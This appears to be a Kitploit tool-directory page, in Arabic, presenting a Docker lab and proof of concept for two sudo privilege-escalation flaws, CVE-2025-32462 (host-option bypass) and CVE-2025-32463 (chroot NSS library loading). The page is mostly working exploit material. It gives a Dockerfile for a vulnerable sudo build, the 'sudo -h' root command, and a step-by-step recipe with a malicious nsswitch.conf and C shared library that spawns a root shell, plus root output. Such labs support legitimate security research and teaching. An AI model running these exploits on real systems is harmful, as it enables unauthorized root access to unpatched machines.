Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32462_32463-Lab — PoC يعتمد على Docker للثغرة CVE-2025-32462 والثغرة CVE-2025-32463 (sudo)، استنادًا إلى بحث Stratascale CRU. | Kitploit
أدوات/GitHubGitHub/maaythm/cve-2025-32462_32463-lab
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubmaaythm/cve-2025-32462_32463-lab

CVE-2025-32462_32463-Lab

PoC يعتمد على Docker للثغرة CVE-2025-32462 والثغرة CVE-2025-32463 (sudo)، استنادًا إلى بحث Stratascale CRU.

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32462 & CVE-2025-32463 – معمل PoC

هذا معمل قائم على الحاويات وإثبات مفهوم (PoC) للثغرات التالية في sudo:

  • CVE-2025-32462 – تجاوز منطق مطابقة المضيف في sudo -h
  • CVE-2025-32463 – الهروب من مكتبة NSS عبر chroot في sudo -R

🔒 لأغراض تعليمية فقط. لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن لاختبارها.


🔬 البحث الأصلي

  • مقالة المدونة حول CVE-2025-32462: تصعيد امتيازات host alias في sudo
  • مقالة المدونة حول CVE-2025-32463: تجاوز NSS عبر chroot في sudo

🧠 الإسناد البحثي

  • Rich Mirch
    وحدة أبحاث الأمن السيبراني في Stratascale (CRU)
    @Stratascale

🧪 إعداد المعمل (Docker)

🔧 Dockerfile

root@kitploit:~
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \\
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \\
                       pkg-config libssl-dev git nano gcc && \\
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \\
    tar xzf sudo-1.9.16p2.tar.gz && \\
    cd sudo-1.9.16p2 && \\
    ./configure --disable-gcrypt --prefix=/usr && make && make install

RUN useradd -m -s /bin/bash pwn && echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

🚀 البناء والتشغيل

root@kitploit:~
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d --network sudolabnet --ip 172.190.0.3 --hostname 'lowpriv.test.local' --add-host highpriv.test.local:172.190.0.2 --name lowpriv sudo-vuln-lab tail -f /dev/null

إعداد إضافي لـ CVE-2025-32462

root@kitploit:~
docker exec -u root -it lowpriv bash

# inside root shell of docker container
root@lowpriv:/home/pwn# echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

الاستغلال اليدوي

CVE-2025-32462

التشغيل العادي

root@kitploit:~
pwn@lowpriv:~$ sudo id
Password: ^C
sudo: a password is required

الاستغلال

root@kitploit:~
pwn@lowpriv:~$ sudo -h highpriv.test.local id
uid=0(root) gid=0(root) groups=0(root)

pwn@lowpriv:~$ sudo -h highpriv.test.local hostname -f
lowpriv.test.local

CVE-2025-32463

التشغيل العادي

root@kitploit:~
pwn@lowpriv:~$ sudo id
Password: 
pwn is not allowed to run sudo on lowpriv.

التحضير

root@kitploit:~
# Step 1: Create the chroot directory structure
mkdir -p exploitDir/etc

# Step 2: Write a malicious nsswitch.conf to load our exploit module
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf

# Step 3: Create directory for the malicious NSS library
mkdir libnss_

# Step 4: Copy necessary group file into chroot environment
cp /etc/group exploitDir/etc/

# Step 5: Write the malicious NSS shared library source code
cat > cve_2025_32463.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

# Step 6: Compile the malicious NSS shared library
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

# Step 7: Launch sudo with chroot to trigger the vulnerability
sudo -R exploitDir HEHE RUN THIS AND GIVE ME ROOT

root@lowpriv:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

إخلاء المسؤولية

إثبات المفهوم هذا مخصص للأغراض التعليمية والبحثية المصرح بها فقط.


✍️ المؤلف

معمل PoC وبيئة Docker من إعداد MAAYTHM.

الإسناد البحثي: Rich Mirch – Stratascale CRU

تنزيل الأداة